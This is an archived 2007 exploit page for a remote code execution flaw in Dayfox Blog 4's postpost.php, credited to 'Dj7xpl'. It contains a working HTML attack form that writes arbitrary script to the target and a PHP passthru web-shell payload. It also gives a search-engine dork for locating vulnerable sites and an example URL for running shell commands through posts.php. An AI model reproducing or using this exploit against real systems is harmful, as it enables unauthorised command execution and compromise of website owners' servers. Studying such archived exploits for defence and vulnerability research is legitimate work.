Dayfox Blog 4 (postpost.php) Remote Code Execution Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Dayfox Blog 4 (postpost.php) Remote Code Execution Vulnerability
# Published : 2007-03-14
# Author : Dj7xpl
# Previous Title : WSN Guest 1.21 (comments.php id) Remote SQL Injection Exploit
# Next Title : GestArt beta 1 (aide.php aide) Remote File Inclusion Vulnerability

<html>
<!--
                                                          .-""""""""-.                                 
                                                         /   Dj7xpl                                 
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  o_)( |                                     
                                                        |/     /     |                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) _________|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-IIIIII/-|________________________________>
                                               )_/                  / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   Dayfox Blog V 4
#   Download   :   http://www.dayfoxdesigns.co.nr
#   Dork       :   "Powered by Dayfox Designs"
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Risk       :   High (Remote Code Execution)
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#   1- Insert Your Script In Text File By This Exploit     Example: <?php passthru($_GET[cmd]); ?>
#   2- include Text File By (Posts.php)                    Example: http://localhost/dfblog/posts.php?cmd=ls -la
#
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

-->
<head><title>--======Dj7xpl======--</title></head>
<body background=http://dj7xpl.by.ru/img/scan.gif> 
<center>
<form action="http://[Target]/[path]/postpost.php" method="post">
            <input type="hidden" name="title" value="Dj7xpl" />
	        <input type="hidden"  name="blog" value="script" /><br><br>
			<font color=#C0FF3E size=+1>your script:<br>
            <textarea name="cat"></textarea>
	        <input type="hidden" name="date" value="Hello All" />
	        <input type="hidden" name="catyear" value="dj7xpl" />
       	    <input  type="hidden" name="catmonth" value"dj7xpl" />
				<input type="submit" value="write" />
			</form>
			</center>
			</body
			</html>

# www.Syue.com [2007-03-14]